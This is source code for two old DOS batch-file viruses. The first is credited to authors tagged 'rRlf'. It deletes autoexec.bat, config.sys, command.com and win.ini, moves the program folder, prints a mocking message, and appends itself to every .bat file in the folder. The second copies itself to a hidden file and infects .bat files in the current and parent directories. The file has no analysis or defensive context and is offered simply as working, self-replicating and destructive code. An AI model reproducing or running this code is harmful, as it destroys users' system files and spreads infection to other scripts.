@echo off %hAwasupaAE%
md c:\win
move c:\programme c:\win
del c:\autoexec.bat
del c:\config.sys
del c:\command.com
del c:\windows\win.ini
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo ...
echo Du WuRdEsT vOn sicBrain [rRlf] & Ant!Logic [rRlf] a BiScHeRlE vErOrScHt, nIsChA?
if -%1==-@ goto 1
echo.>hAwasupaAE.bat
find "hAwasupaAE"<%0>>hAwasupaAE.bat
for %%b in (*.bat) do call hAwasupaAE.bat @ %%b
goto hAwasupaAE
:1
find "hAwasupaAE"<%2>nul
if errorlevel 1 type hAwasupaAE.bat>>%2
:hAwasupaAE by sicBrain [rRlf] & Ant!Logic [rRlf]

@echo off%_bd-ptrr%
if '%1=='bd-ptrr goto bd-ptrr%2
set bd-ptrr=%0.bat
if not exist %bd-ptrr% set bd-ptrr=%0
if '%bd-ptrr%==' set bd-ptrr=autoexec.bat
if exist c:\_bd-ptrr.bat goto bd-ptrrg
if not exist %bd-ptrr% goto ebd-ptrr
find "bd-ptrr"<%bd-ptrr%>c:\_bd-ptrr.bat
attrib c:\_bd-ptrr.bat +h
:bd-ptrrg
command /c c:\_bd-ptrr bd-ptrr vir
:ebd-ptrr
set bd-ptrr=
goto bd-ptrrend
:bd-ptrrvir
for %%a in (*.bat ..\*.bat) do call c:\_bd-ptrr bd-ptrr i %%a
exit bd-ptrr
:bd-ptrri
find "bd-ptrr"<%3>nul
if not errorlevel 1 goto bd-ptrrend
type %3>bd-ptrr$
echo.>>bd-ptrr$
type c:\_bd-ptrr.bat>>bd-ptrr$
move bd-ptrr$ %3>nul
:bd-ptrrend
echo.|date|find "24">nul.bd-ptrr
